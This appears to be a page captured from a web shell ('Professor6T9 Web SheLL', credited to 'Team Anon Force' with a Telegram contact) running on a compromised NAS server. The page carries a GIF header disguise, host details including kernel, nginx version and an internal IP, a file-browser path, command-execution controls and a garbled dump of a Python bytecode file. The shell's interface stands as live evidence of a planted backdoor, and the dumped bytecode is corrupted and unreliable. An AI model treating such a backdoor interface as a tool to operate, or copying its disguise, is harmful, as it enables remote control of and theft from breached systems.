GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
setuptools
/
_distutils
/
command
/
__pycache__
[ HOME ]
Exec
Submit
File Name : build_ext.cpython-38.pyc
U �}�hj| � @ s� d Z ddlZddlZddlZddlZddlmZ ddlmZ ddl m Z ddlmZ ddl mZmZmZmZmZmZ dd lmZ dd lmZmZmZ ddlmZmZ e�d�Zd d� ZG dd� de�Z dS )z�distutils.command.build_ext Implements the Distutils 'build_ext' command, for building extension modules (currently limited to C extensions, should accommodate C++ extensions ASAP).� N)�log)� USER_BASE� )�newer_group)�Command)�CCompilerError�CompileError�DistutilsError�DistutilsOptionError�DistutilsPlatformError�DistutilsSetupError)� Extension)�customize_compiler�get_config_h_filename�get_python_version)�get_platform�is_mingwz3^[a-zA-Z_][a-zA-Z_0-9]*(\.[a-zA-Z_][a-zA-Z_0-9]*)*$c C s ddl m} | � d S )Nr ��show_compilers)� ccompilerr r � r �N/tmp/pip-target-k_nuic9h/lib/python/setuptools/_distutils/command/build_ext.pyr ! s r c @ s* e Zd ZdZdej� d�Zddddde� � d �fd ddd e fdddddde fddddddddddgZddd d!d"gZ d#d$d%e fgZd&d'� Ze d(d)� �Zd*d+� Zd,d-� Zd.d/� Zd0d1� Zd2d3� Zd4d5� Zd6d7� Zd8d9� Zejd:d;� �Zd<d=� Zd>d?� Zd@dA� ZdBdC� ZdDdE� ZdFdG� ZdHdI� Z dJdK� Z!d$S )L� build_extz8build C/C++ extensions (compile/link to build directory)z (separated by 'z'))z build-lib=�bz(directory for compiled extension modules)zbuild-temp=�tz1directory for temporary files (build by-products)z plat-name=�pz;platform name to cross-compile for, if supported [default: �])�inplace�iziignore build-lib and put compiled extensions into the source directory alongside your pure Python modulesz include-dirs=�Iz.list of directories to search for header files)zdefine=�DzC preprocessor macros to define)zundef=�Uz!C preprocessor macros to undefine)z libraries=�lz!external C libraries to link withz library-dirs=�Lz.directories to search for external C libraries)zrpath=�Rz7directories to search for shared C libraries at runtime)z link-objects=�Oz2extra explicit link objects to include in the link)�debug�gz'compile/link with debugging information)�force�fz2forcibly build everything (ignore file timestamps))z compiler=�czspecify the compiler type)z parallel=�jznumber of parallel build jobs)�swig-cppNz)make SWIG create C++ files (default is C))z swig-opts=Nz!list of SWIG command line options)zswig=Nzpath to the SWIG executable)�userNz#add user include, library and rpathr r&